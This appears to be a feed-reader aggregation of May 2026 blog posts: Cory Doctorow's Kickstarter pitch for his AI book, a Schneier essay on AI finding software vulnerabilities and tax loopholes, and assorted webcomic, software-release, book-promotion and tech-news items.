A mockup of a smartphone displaying an audiobook app that's playing 'The Reverse Centaur's Guide to Life After AI'. Next to it appears this text: 'A masterly polemic, its scope so sweeping that it does, finally, seem to explain every pungent odor wafting from Silicon Valley. —Harper's (on Enshittification)'

  • AI is a normal technology, and in the absence of the bubble, we'd call this collection of technically interesting, sometimes useful tools "plug-ins":

https://pluralistic.net/2026/02/19/now-we-are-six/#stock-buyback

  • A chatbot can't do your job, but an AI salesman can absolutely convince your boss to fire you and replace you with a chatbot that can't do your job:

https://pluralistic.net/2025/03/18/asbestos-in-the-walls/#government-by-spicy-autocomplete

  • Despite the fact that the AI can't do your job, there are many ways that AI can be used to erode your wages and working conditions:

https://pluralistic.net/2026/04/06/empiricism-washing/#veena-dubal

  • The workers who say that their jobs are worse and the things they produce are much worse as a result of AI are correct; but the workers who say their work is much better thanks to AI are also correct. This only seems like a riddle until you understand that the most important fact about any technology (including AI) isn't what it does, but who it does it for and who it does it to:

https://pluralistic.net/2025/09/11/vulgar-thatcherism/#there-is-an-alternative

A mockup of a smartphone displaying an audiobook app that's playing 'The Reverse Centaur's Guide to Life After AI'. Next to it appears this text: 'You could not ask for a clearer, more ambitious or better-written business book than this one . . . Doctorow deserves thanks for his service. —The Financial Times (on Enshittification)'

  • When a boss fires a worker and gives their job to an AI, it usually means that they don't care if that job is done well, which is why customer service jobs are being handed over to AI:

https://pluralistic.net/2025/08/06/unmerchantable-substitute-goods/#customer-disservice

  • Bosses also love firing coders and replacing them with AI – first, because bosses are really angry about the decades when tech workers were in short supply and bosses had to pretend to like them, and second, because if you're selling AI as a way to replace workers, what better way to convince a potential customer than to fire the workers your own company depends upon? (All that said, the coders who are excited about their new AI coding tools have a point – when a worker is in charge of their work and thus when and how they use a tool, we should defer to their own experience):

https://pluralistic.net/2025/08/05/ex-princes-of-labor/#hyper-criti-hype

  • Artists are also a favorite target of AI bosses, which is weird, because the wages of creative workers add up to a total that rounds to zero when compared with the unimaginably large sums AI companies will have to take in if they are to pay back the trillions they've spent to date (let alone the trillions more they're proposing to spend in the near term). All of this raises a foundational question: can AI "art" ever be good? (Spoiler: probably not):

https://pluralistic.net/2025/03/25/communicative-intent/#diluted

  • Media companies say they have the answer to the AI art question: they'll create (or assert) a copyright that lets them control AI training. This is an incredibly transparent ruse: media companies are artists' class enemies, and if we get a new right to control AI training, our bosses will demand that we sign it away to them as part of their non-negotiable, one-sided standard contracts:

https://pluralistic.net/2024/11/18/rights-without-power/#careful-what-you-wish-for

A mockup of a smartphone displaying an audiobook app that's playing 'The Reverse Centaur's Guide to Life After AI'. Next to it appears this text: 'Essential to understanding today’s digital economy. —Rohit Chopra, Former head of the Consumer Financial Protection Bureau (on Enshittification)'

  • For creative workers, the answer to these new would-be tech bosses isn't asserting a new right that will be expropriated by the old media bosses who've been ripping us off forever. Our salvation lies in leaning into the US Copyright Office's interpretation that holds that AI-generated works can't be copyrighted, because copyright is only for human creations. That means that the only way our bosses can get a copyright over the things they want to sell is to pay us to make them:

https://pluralistic.net/2026/03/03/its-a-trap-2/#inheres-at-the-moment-of-fixation

  • Many of the seemingly urgent AI questions that people won't shut up about are distractions, because they assume that AI will lastingly infiltrate every part of our society. In reality, the AI companies are losing unimaginable amounts and have no path to profitability:

https://pluralistic.net/2025/06/30/accounting-gaffs/#artificial-income

  • The only jobs that AI can do better than humans are jobs that shouldn't exist, like figuring out how to maximize undetectable wage-theft:

https://pluralistic.net/2024/12/18/loose-flapping-ends/#luigi-has-a-point

  • AI is also really good at figuring out how to do individualized price-gouging, another thing that shouldn't exist:

https://pluralistic.net/2026/01/21/cod-marxism/#wannamaker-slain

  • Despite AI's manifest unsuitability to do jobs that should exist, bosses keep firing people and replacing them with chatbots that do their jobs very badly. This allows bosses to indulge their solipsistic fantasy of a world without people, in which customers, workers and suppliers are statistical artifacts and bosses are unitary geniuses who simply imagine a product or service and then it is delivered, without any ego-shattering confrontations with people who know how to do things:

https://pluralistic.net/2026/01/05/fisher-price-steering-wheel/#billionaire-solipsism

  • This is catastrophic, and not just for the parties involved today. The AI bubble will pop, and when it does, the chatbots that do these jobs (badly) will be switched off. Meanwhile, the workers those chatbots replaced will have retrained, retired, or become "discouraged." No one will be around to do those (necessary) jobs. AI is the asbestos we are shoveling into the walls of our civilization and our descendants will be digging it out for generations:

https://pluralistic.net/2025/09/27/econopocalypse/#subprime-intelligence

  • The real existential AI threat isn't that we'll accidentally teach the word-guessing program so many words that it awakens and becomes a vengeful god. The real risk is that when the bubble bursts we'll indulge the ruling class's reflex to austerity, and that this will continue the decades of mass economic traumatization that makes people into easy marks for fascists:

https://pluralistic.net/2026/04/12/always-great/#our-nhs

  • But when the AI bubble pops, that won't be the end of AI – it will be the end of the bubble. When the AI bubble pops, we'll have mountains of GPUs at fire-sale prices, skilled workers liberated from the imperative to help their bosses promote their stock swindle, and open source models that will yield tremendous dividends to anyone who sets out to optimize them:

https://pluralistic.net/2025/10/16/post-ai-ai/#productive-residue

As you can see from the links above, I developed The Reverse Centaur's Guide to Life After AI in the same way that I developed Enshittification: in public, through a series of essays, which I periodically synthesized into major, widely shared speeches:

https://pluralistic.net/2025/12/05/pop-that-bubble/#u-washington

Making my working notes public is a hugely effective way of producing and refining critical work, and it's been my method for 25 years now:

https://pluralistic.net/2021/05/09/the-memex-method/

It's a method that's let me produce a string of international bestsellers, published by some of the largest publishers in the world. Nevertheless, Amazon refuses to carry my audiobooks:

https://pluralistic.net/2022/07/25/can-you-hear-me-now/#acx-ripoff

That's because I have an iron-clad requirement that my work be sold in open formats, without the "digital rights management" that blocks you from moving the books you bought on Amazon to someone else's apps. Digital rights management (DRM) enjoys bizarre legal protections so that it's a felony for me to give you the tools you need to move the books I wrote out of an Amazon app and into a competitor's app:

https://pluralistic.net/2026/01/14/sole-and-despotic/#world-turned-upside-down

What's more, these outrageous legal rights extend around the world, because the US Trade Representative spent decades bullying America's trading partners into passing laws that criminalize the act of fixing the defects in America's tech exports, which is why farmers can't fix their John Deere tractors, hospitals can't fix their Medtronic ventilators, and no one can sell you an app that stops Apple and Google from spying on your phone:

https://pluralistic.net/2026/01/01/39c3/#the-new-coalition

Amazon's Audible controls 90% (!) of the audiobook market, and they will not sell any book unless they can permanently lock it to their platform. That means that every time a writer sells you an audiobook on Audible, they create a "switching cost" that stops you from leaving Audible for a competitor. Not only is this fundamentally unjust, it's also terrible for creators: if our audiences can't leave Amazon, then we can't leave Amazon either, which means Amazon can (and does!) steal millions of dollars from writers without losing our business:

https://pluralistic.net/2022/09/07/audible-exclusive/#audiblegate

Which is where these Kickstarter campaigns come in. Whenever I sell a new book to a publisher, I arrange to make my own independent audiobook for it, which I sell everywhere except the platforms that have mandatory DRM: Audible, Apple and Audiobooks.com. There are some very good DRM-free audiobook stores, notably Libro.fm and Downpour.com (Google Play also sells audiobooks without DRM). But most people have never heard of these, so it wasn't until I started pre-selling my audiobooks on Kickstarter that I was able to make my stubborn refusal to sell out to Audible into a paying proposition. My agent tells me that if I'd sold out to Audible, I'd have paid off my mortgage and I'd be able to give my kid a full ride through a fancy US college. I don't make that kind of money from these Kickstarters, but they do very well nevertheless, and they're a critical part of my family's finances.

The Kickstarter is live for the next three weeks:

https://www.kickstarter.com/projects/doctorow/the-reverse-centaurs-guide-to-life-after-ai

A mockup of 'The Reverse Centaur's Guide to Life After AI' and 'Enshittification' on e-readers, and smartphones displaying audiobook apps, as well as the paperback edition of 'Reverse Centaur.'

You can pre-order print copies of Reverse Centaur, as well as DRM-free ebooks and audiobooks (narrated by me!) for Reverse Centaur and Enshittification. Normally, I offer custom-signed copies of the print books, but Enshittification was so successful that I haven't stopped touring it and I'm in a new city every couple of days, so there's no way I can reliably get into a warehouse to sign the latest batch of orders. Instead, I'll be posting the contact details for every bookstore that's hosting me on my tours (US in June, UK in September) and you can order signed copies from them, which I'll personalize after my events there so they can ship them to you.

I've also decided to raise money for the Electronic Frontier Foundation (eff.org), the nonprofit I've worked at for nearly 25 years. EFF is the oldest, best and most effective tech rights organization in the world, and its mission has only gotten more important over the years. EFF's outreach folks are offering a special membership package for backers of the Kickstarter, which includes an EFF hat and stickers, as well as an Enshittification pin and two Enshittification stickers:

https://pluralistic.net/2026/04/24/poop-emoji-plus-plus/#devin-washburn

The audiobook is fully recorded and finalized and you can listen to the first hour of it here:

https://archive.org/details/reverse-centaur-audio-sample

It came out great (as always!), thanks to the terrific direction of Gabrielle De Cuir of Skyboat Media and editing from Wryneck Studios' John Taylor Williams. Gabrielle's directed all my audiobooks since 2017, and John's been mastering my podcasts since 2006 (!!), so we constitute a very well-oiled machine.

Working out my ideas in public allows me to produce my Pluralistic newsletter, and with it, a large volume of free, high-quality work that's licensed under a generous Creative Commons license that lets anyone reproduce, translate, redistribute and even sell my articles. If you've enjoyed that work, I hope you'll consider backing the campaign! Selling books is how I pay the bills and keep the lights on, and as ever, this is the only way you can get a major publisher's ebooks and audiobooks with no DRM and no "terms of service." These are truly ebooks and audiobooks that you own. You can sell them, give them away, or lend them out – so long as you don't violate copyright law, we're all cool:

https://www.kickstarter.com/projects/doctorow/the-reverse-centaurs-guide-to-life-after-ai


Hey look at this (permalink)



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago RIP, Douglas Adams http://news.bbc.co.uk/1/hi/uk/1326657.stm

#20yrsago Douglas Coupland models his life & books on net rumors about him https://web.archive.org/web/20060515220320/https://www.wired.com/wired/archive/14.05/posts.html?pg=6

#15yrsago Vindictive lumber baron’s far-flung heirs inherit, 91 years after his death https://abcnews.com/Business/lumber-barons-descendants-receive-inheritance-92-years-death/story?id=13569633

#15yrsago R2D2 trashcan https://web.archive.org/web/20171208014511/https://i.imgur.com/x3w0I.jpg

#15yrsago Napier’s Bones: math and mysticism make for great international adventure https://memex.craphound.com/2011/05/12/napiers-bones-math-and-mysticism-make-for-great-international-adventure/

#15yrsago China’s shonky Disneyland-a-like park closed https://web.archive.org/web/20110515073221/https://thedisneyblog.com/2011/05/13/fake-disney-theme-park-in-china-forced-to-close/

#10yrsago Open letter from EFF to members of the W3C Advisory Committee https://www.eff.org/deeplinks/2016/05/open-letter-members-w3c-advisory-committee

#10yrsago Gallery show of forks stolen from rich people, sealed to preserve crumbs & saliva https://web.archive.org/web/20160505183026/https://www.theguardian.com/artanddesign/2016/apr/27/crumbs-and-all-prince-harry-hillary-clinton-and-julia-gillard-have-cutlery-swiped-for-exhibition

#10yrsago German publishers owe writers €100M in misappropriated royalties https://uebermedien.de/4444/schoener-verlegen-mit-dem-geld-anderer-leute/

#10yrsago Chinese state-backed corporations beat US lawsuits with sovereign immunity https://www.reuters.com/article/us-china-usa-companies-lawsuits-idUSKCN0Y2131/

#10yrsago Anal fisting site breached: 100K passwords, usernames, email addresses and IPs extracted https://web.archive.org/web/20160511121337/https://motherboard.vice.com/read/rosebuttboard-ip-board

#10yrsago Reading With Pictures: awesome, classroom-ready comics for math, social studies, science and language arts https://memex.craphound.com/2016/05/12/reading-with-pictures-awesome-classroom-ready-comics-for-math-social-studies-science-and-language-arts/

#5yrsago Crooked Timber's Ministry for the Future Seminar https://pluralistic.net/2021/05/12/seminar-for-the-future/#imaginations

#1yrago Trump can't do ANYTHING for his base https://pluralistic.net/2025/05/12/greased-slide/#greased-pole


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Stahle covers.

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)
  • "Enshittification: Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), FirstSecond, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, FirstSecond, April 20, 2027

  • "The Memex Method," Farrar, Straus and Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

  • "The Reverse Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.
  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

How Dangerous Is Anthropic’s Mythos AI? [Schneier on Security]

Last month, Anthropic made a remarkable announcement about its new model, Claude Mythos Preview: it was so good at finding security vulnerabilities in software that the company would not release it to the general public. Instead, it would only be available to a select group of companies to scan and fix their own software.

The announcement requires context—but it contained an essential truth.

While Anthropic’s model is really good at finding software vulnerabilities, so are other models. The UK’s AI Security Institute found that OpenAI’s GPT-5.5, already generally available, is comparable in capability. The company Aisle reproduced Anthropic’s published results with smaller, cheaper models.

At the same time, Anthropic’s refusal to publicly release its new model makes a virtue out of necessity. Mythos is very expensive to run, and the company doesn’t appear to have the resources for a general release. What better way to juice the company’s valuation than to hint at capabilities but not prove them, and then have others parrot their claims?

Nonetheless, the truth is scary. Modern generative AI systems—not just Anthropic’s, but OpenAI’s and other, open-source models—are getting really good at finding and exploiting vulnerabilities in software. And that has important ramifications for cybersecurity: on both the offense and the defense.

Attackers will use these capabilities to find, and automatically hack, vulnerabilities in systems of all kinds. They will be able to break into critical systems around the world, sometimes to plant ransomware and make money, sometimes to steal data for espionage purposes, and sometimes to control systems in times of hostility. This will make the world a much more dangerous, and more volatile, place.

But at the same time, defenders will use these same capabilities to find, and then patch, many of those same systems. For example, Mozilla used Mythos to find 271 vulnerabilities in Firefox. Those vulnerabilities have been fixed, and will never again be available to attackers. In the future, AIs automatically finding and fixing vulnerabilities in all software will be a normal part of the development process, which will result in much more secure software.

Of course, it’s not that simple. We should expect a deluge of both attackers using newly found vulnerabilities to break into systems, and at the same time much more frequent software updates for every app and device we use. But lots of systems aren’t patchable, and many systems that are don’t get patched, meaning that many vulnerabilities will stick around. And it does seem that finding and exploiting is easier than finding and fixing. All of this points to a more dangerous short-term future. Organizations will need to adapt their security to this new reality.

But it’s the long term that we need to focus on. Mythos isn’t unique, but it’s more capable than many models that have come before. And it’s less capable than models that will come after. AIs are much better at writing software than they were just six months ago. There’s every reason to believe that they will continue to get better, which means that they will get better at writing more secure software. The endgame gives AI-enhanced defenders advantages over AI-enhanced attackers.

Even more interesting are the broader implications. The same searching, pattern-matching and reasoning capabilities that make these models so good at analyzing software almost certainly apply to similar systems. The tax code isn’t computer code, but it’s a series of algorithms with inputs and outputs. It has vulnerabilities; we call them tax loopholes. It has exploits; we call them tax avoidance strategies. And it has black hat hackers: attorneys and accountants.

Just as these models are finding hundreds of vulnerabilities in complex software systems, we should expect them to be equally effective at finding many new and undiscovered tax loopholes. I am confident that the major investment banks are working on this right now, in secret. They’ve fed AI the tax code of the US, or the UK, or maybe every industrialized country, and tasked the system with looking for money-saving strategies. How many tax loopholes will those AIs find? Ten? One hundred? One thousand? The Double Irish with a Dutch Sandwich is a tax loophole that involves multiple different tax jurisdictions. Can AIs find loopholes even more complex? We have no idea.

Sure, the AIs will come up with a bunch of tricks that won’t work, but that’s where those attorneys and accountants come in—to verify, and then justify, the loopholes. And then to market them to their wealthy clients.

As goes the tax code, so goes any other complex system of rules and strategies. These models could be tasked with finding loopholes in environmental rules, or food and safety rules—anywhere there are complex regulatory systems and powerful people who want to evade those rules.

The results will be much worse than insecure computers. Tax loopholes result in less revenue collected by governments, and regulatory loopholes allow the powerful to skirt the rules, both of which have all sorts of social ramifications. And while software vendors can patch their systems in days, it generally takes years for a country to amend its tax code. And that process is political, with lobbyists pressuring legislators not to patch. Just look at the carried interest loophole, a US tax dodge that has been exploited for decades. Various administrations have tried to close the vulnerability, but legislators just can’t seem to resist lobbyists long enough to patch it.

AI technologies are poised to remake much of society. Just as the industrial revolution gave humans the ability to consume calories outside of their bodies at scale, the AI revolution will give humans the ability to perform cognitive tasks outside of their bodies at scale. Our systems aren’t designed for that; they’re designed for more human paces of cognition. We’re seeing it right now in the deluge of software vulnerabilities that these models are finding and exploiting. And we will soon see it in a deluge of vulnerabilities in all sorts of other systems of rules. Adapting to this new reality will be hard, but we don’t have any choice.

This essay originally appeared in The Guardian.

11:28

Grrl Power #1460 – Chemical opposites [Grrl Power]

Edit: Okay, I fixed the typo in panel 2, and I did another pass on the looked-like-a-strap-on in panel 3. It was admittedly a little distracting once it was repeatedly pointed out. I don’t blame you guys. It did look like Sciona was about to give him what for.

How do Sciona’s bangs get longer when her hair is down? Magic, probably. Don’t worry about it.

Deus sure gets a lot of mileage out of that “I’m going to be a jerk but it’s because I respect you so much” bit. He used it on Maxima, though I honestly couldn’t tell you what page that was. Ironically, the more intelligent the person is, the fewer times he could pull it off with them, even if he was being mostly sincere.

You know, if Sciona… sorry, if Escorpia really was a sicario/narcotraficante, she probably would have had a lot more tattoos than just the… temple tattoo? It’s more like a “mohawk negative space tattoo.” Not that I’m aware of any comprehensive audit of female merc/drug runner tattoo coverage. I guess Sciona lucked out that Escorpia was content with just the one on her skull. Presumably if she can permanently change her hair color and length with a spell, she could probably remove or at least hide tattoos. Really the only reason she still had the one on her head under the hair she was growing out was for you guys’ benefit. (guys’s?)

Sciona usually does not “take smug.” She’s murdered for a lot less than that. But Deus is too important of a potentially exploitable resource to her. He’s also pretty good in bed, which isn’t a deciding factor, but it is a factor. She knows that if she killed him, the Alari from the colony ship would almost definitely assume control of Galytn, which would probably be both good and bad for her plans, and Deus can more or less run interference for her regarding them.

Sciona’s original final line was “I am seriously reconsidering fucking you.” Which I think is more pithy than what I changed it to, (Actually the very first draft read “sleeping with you” but that didn’t feel right either) but the more I thought about it, the more it sounded like she was planning on sleeping with him for his sake, like some sort of transactional reward. I suppose for being good at it the last time, maybe? So not some selfless sacrifice on her part, certainly, but there was something vaguely “It’s a man’s world, and I’m very sexy, which is mostly for the benefit of men, and he deserves his prize” in the sentiment. Yes, it’s possible to overanalyze these things, but it doesn’t hurt to occasionally step back and do a paradigm check. The comic is mostly female characters, and while I certainly can’t claim any special insight into the female mind, I do at least attempt to consider that perspective… Even if a lot of them do have fairly typically male behaviors and hobbies. But I write what I know, and would the comic be any better if I did some deep dive into typically feminine hobbies so Sydney could launch into the occasional dissertation about… quilting? Not that women couldn’t be into literally any hobby, of course, but the point of all this would have been to “feminize” some of the female characters, and saying that Harem is into restoring vintage tractors doesn’t really accomplish that. Although… she was raised on a farm… Hmm.

Anyway, I edited Sciona’s lines mostly because I don’t want all the characters to sound the same, and my first draft felt more sit-commy, and less “sociopathic blood mage.”

I sort of feel guilty when I post a page with only 4 panels. I mean, not that guilty, but for all I gripe about cramming way too many panels on a page and having to draw tiny faces, when I get to the occasional page that just wouldn’t benefit from wedging three more panels in there, it does feel a bit… light? Oh well, I’ll get over it.


Sexy bodymod news lady Gail has a special one-on-one interview with Tournament Quarter finalist Saraviah Nightwing! And if you subscribe to Gail’s Space Patreon, (which, due to the vagaries of Earth and Gal-Net’s DNS servers, happens to be the same as the Grrl Power Patreon, go figure) you can see that same interview in the nude! Well, eventually. The nude part of the interview, as well as the version that includes shading will be coming soon. Of course, you can view the interview in the nude now if you take your own clothes off. You know. Technically. Just put a towel on your chair first.

 


Double res version will be posted over at Patreon. Feel free to contribute as much as you like.

10:49

Cats & Dogs [Seth's Blog]

A dog gets fed and thinks his person is an omniscient, benevolent being.

A cat gets fed and thinks it is.

How we see ourselves in this analogy is actually up to each of us, every day. It also tells us a bit about how we think about customers, vendors, and partners.

02:35

[$] LWN.net Weekly Edition for May 14, 2026 [LWN.net]

Inside this week's LWN.net Weekly Edition:

  • Front: Fedora AI; Forgejo "carrot" disclosure; memory-management maintainership; huge THPs; mshare; 64KB base pages; DAMON; direct map.
  • Briefs: Dirty Frag; Fragnesia; Mythos and curl; killswitch; Debian reproducible builds; KDE investment; Quotes ...
  • Announcements: Newsletters, conferences, security updates, patches, and more.

Wednesday, 13 May

23:35

GNUtrition 0.33.0rc2 Now Available [Planet GNU]

A test release of GNUtrition, 0.33.0rc2, is now available.

GNUtrition is free nutrition analysis software written for the GNU operating system. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.

This release makes some fixes to the gender option. It also applies a fix to ./version.sh that affected builds from CVS checkouts; tarball builds were unaffected, since the tarballs include the version in a .ver file.
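The fix described above reflects a common packaging pattern: a generated version file ships in the release tarball, while a VCS checkout lacks it and has to derive the version another way. A minimal sketch of that fallback logic (the `.ver` filename comes from the announcement; the `get_version` helper and the fallback string are hypothetical, and this is not GNUtrition's actual `version.sh`):

```shell
#!/bin/sh
# get_version DIR -- print the package version for the source tree at DIR.
# Release tarballs ship a .ver file written at "make dist" time; a CVS
# checkout lacks it and must fall back to some other source (hardcoded
# here purely for illustration).
get_version() {
    dir="$1"
    if [ -f "$dir/.ver" ]; then
        # Tarball build: use the recorded version verbatim.
        cat "$dir/.ver"
    else
        # VCS checkout: no .ver file; the real script would derive this
        # from the repository rather than hardcoding it.
        echo "0.33.0rc2-cvs"
    fi
}
```

Handling both cases explicitly is what keeps a checkout build from failing (or mislabeling itself) when the generated file is absent.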

More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/.  This test release can be obtained from the alpha.gnu.org server at one of the following:


Please report any problems you experience to the GNUtrition bug reports mailing list: <bug-gnutrition@gnu.org> (https://lists.gnu ... fo/bug-gnutrition).

23:14

The Myriad [Penny Arcade]

We will return to our regularly scheduled spelunking of our nearly thirty-year archive soon, but Playground Games banning Forza Horizon 6 pirates for thousands of years was too funny to leave alone. We had to strike - if for no other reason than I got to make up like four new terms. I got to bear fruit. That's what I'm trying to do every time! I'm tryna stay bulbous.

23:07

Page 13 [Flipside]

Page 13 is done.

22:42

The Big Idea: Sam Beckbessinger [Whatever]

We’ve all got a beast inside us, waiting to be unleashed. Some never hold it back; others keep it caged until it can be repressed no longer. Enter author Sam Beckbessinger, whose fury led to the creation of her newest novel, Femme Feral.

SAM BECKBESSINGER: 

My new novel Femme Feral didn’t grow out of a Big Idea so much as an emotion, or rather, the lack of one. 

About a decade ago I was walking around Cape Town on my way to a friend’s birthday. It was one of those perfect picnic-dress days, a spring-in-your-step song-in-your-heart kind of summer afternoon. Then I realised some dude was following me. I did the things all women do. Reached into my handbag and clutched my keys. Scanned for easy exit routes or an open shop I could dash into. Sped up my walk, but not too much, because you don’t want to over-react or trigger his prey drive. This wasn’t the first time I’d been followed, obviously, but something about this time was different. I wasn’t only afraid, I was furious. I’d been having a lovely day until this creep ruined it! And I found myself having a fantasy I’d never had before: that I could reach into my bag and pull out a gun, turn to him, and make him feel afraid.

This was a shock. I’ve never been an angry person. I hate guns and I loathe violence. So much so, I’ve wondered before whether something was wrong with me. Spend time with any toddler and you’ll see that fury’s a foundational human emotion, yet it’s one I’ve barely ever felt. I’ve been a lifelong good girl, empathetic, nurturing, forgiving – sometimes to my detriment. I started to wonder, what happens to feelings you never feel? Are they still there somewhere inside of you, hidden, waiting? Do they mutate? And when they do finally come roaring out, will they be uglier for having been locked away for so long? 

Femme Feral grew out of those questions. It’s the story of a hypercompetent tech executive in her forties who thinks she’s going through perimenopause, but she’s actually turning into a werewolf. She doesn’t realise it, but once a month, she transforms into a violent beast who savagely mauls everyone who pisses her off in her waking life. The problem is, sometimes it’s the people you love who hurt you the most. Oh, also, there’s an obsessive monster-hunter on her trail – an eighty-four year old vigilante named Brenda who’s trying to find the creature that killed her cat.

The perimenopause part was fun to write, because that’s a joke about how the medical industry still somehow, in 2026, knows about as much about perimenopause as it knows about lycanthropy. When I wrote it, I was myself approaching forty, seeing the first signs of my own oncoming werewolf era (perimenopause usually begins earlier than most people think!). I can’t tell you how many of my friends I’ve seen go to the doctor to get help for a range of confusing midlife symptoms and instead of being given any actual help, the doctor suggests maybe they should try losing some weight. 

But the gorgeous thing about midlife is that it’s also – for many of us – the age our lifelong coping strategies begin to fail, and we’re forced to reckon with everything we’ve been repressing. Anger is an unacceptable emotion in women, so many of us repress it or transform it into something else. The beautiful thing about midlife, for many of us, is that our bodies no longer allow us to do that. Some of us have quite exciting breakdowns that lead to healthy realisations and overdue dramatic life changes; some of us lure our toxic bosses into an alleyway and rip their intestines out. Whatever a girl’s got to do.

This is exactly what I love so much about horror: how it allows you to speak the language of metaphor and play with our most primal emotions. It amuses me, too, that the werewolf is one of the most stubbornly masculine of monsters in our culture because we still find it impossible to imagine women as uncontrollably violent (there are some glorious exceptions, of course, from Ginger Snaps to Alan Moore’s “The Curse” to Rachel Yoder’s Nightbitch). 

Unlike my previous novel Girls of Little Hope, which I co-wrote with my friend Dale Halvorsen and which we carefully planned and outlined before writing a word of prose, the first draft of Femme Feral came out of me in a hot stinking vomit (almost like … it had been curdling inside of me all this time). The first draft was a half-formed hideous thing, which I then spent several years pulling into the shape of a novel. Many spreadsheets were involved, since control is my coping mechanism of choice. 

I had a blast taking a wild premise and then trying to work through the consequences very seriously. If you could rip someone’s head off, whose head would tempt you first? What would an NHS GP say if you told him that once a month you find yourself naked and covered in blood on the other side of town with no memory of how you got there? And the question that probably vexed me more than any other (and John Landis never had to deal with): how the heck is this beast roaming all around modern London without being spotted by CCTV?

The process of writing this story was deeply therapeutic for me. I’m not sure I’ve fully worked out exactly what I think about anger, but a novel’s not a polemic so it doesn’t require you to have an argument. It only requires you to have some questions, and then to get in touch with the parts of yourself that might be asking them. In my case, that was a furious beast I had been telling myself wasn’t even there. 

---

Femme Feral: Amazon (US)|Barnes & Noble|Bookshop|Powell’s|UK 

Author socials: Website|Instagram

22:21

Haiku gets basic SMP support for ARM64, and unveils its GSoC projects: Bluetooth improvements incoming [OSnews]

The months, they don’t stop coming, so here’s another progress report for Haiku, our beloved successor to BeOS, the best operating system ever made. This past month the team’s added basic support for SMP on ARM64 (enough to use it in QEMU), the MIME sniffer’s internals have been overhauled for some serious performance gains, and a long list of smaller, but no less important or impactful, changes. Beta 6 still seems to be a ways off due to a number of unfixed bugs and an upcoming WebPositive release, but my usual spiel applies: you don’t need to wait for a beta to test Haiku. It’s stable enough as it is, and a nightly release will do you just fine, including updating to newer nightlies and application releases.

This past month also revealed which projects Haiku’s GSoC students will be working on. Two projects will focus on improving Haiku’s Bluetooth stack, including adding HFP profile support and support for HID devices, as well as general Bluetooth improvements across the board. The third and final project will focus on improving and expanding Haiku’s Devices application to turn it into a real management utility along the lines of those available on many other modern operating systems.

21:35

EU weighs restricting use of US cloud platforms to process sensitive government data [OSnews]

The European Union is considering rules that would restrict its member governments’ use of U.S. cloud providers to handle sensitive data, sources familiar with the talks told CNBC.

↫ Kai Nicol-Schwarz at CNBC

Why this has only just become a possible reality now, and not decades ago, is beyond me, but better late than never, I suppose. The Americans voted en masse (not voting is a vote for the winner!) for Trump twice, and there’s no indication they won’t vote for such an anti-Europe basket case again. Their opinions and attitudes towards Europeans are clear: they dislike us deeply, and after the last few years, there’s no going back. Violating trust is easy; restoring it takes decades. Relying on the Americans for our digital infrastructure is, therefore, a monumentally stupid and self-defeating idea.

Of course, many member states are addicted to the cloud services from Google, Microsoft, and Amazon, so there are going to be many individual member states who simply won’t reduce their dependency on the Americans of their own volition. My own country of origin, The Netherlands, only recently signed off on the sale of its government ID services company and associated personal data to an American company, despite the vast majority of the Dutch House of Representatives telling them not to. As such, it makes sense for the EU to step in and simply make it illegal to hand over sensitive data to the Americans.

Of course, we’ve got a long way to go, and I’m sure many of any possible proposed restrictions will be watered down considerably by pressure from major member states. Addiction is a harsh disease.

18:42

Ryan Carson Is a One-Person Code Factory [Radar]

Ryan Carson has built companies for 25 years, including Treehouse, which taught over a million people to code. He knows what it takes to grow a team. So when he told me he’d raised $2 million in seed funding for his latest company, Untangle, an AI-powered divorce assistant, and had no plans to hire anyone, I wanted to understand what that actually looks like.

Ryan stopped writing code professionally around 2008. He’d essentially been “abstracted away” from it by the responsibilities of running a funded startup, as he put it. Following the acquisition of Treehouse and inspired by the arrival of large language models, he decided to teach himself to code again with ChatGPT. Ryan learned Next.js, a framework he’d never touched, using AI as a tutor that was wrong often enough to keep him honest but patient enough that he could go as slowly as he needed.

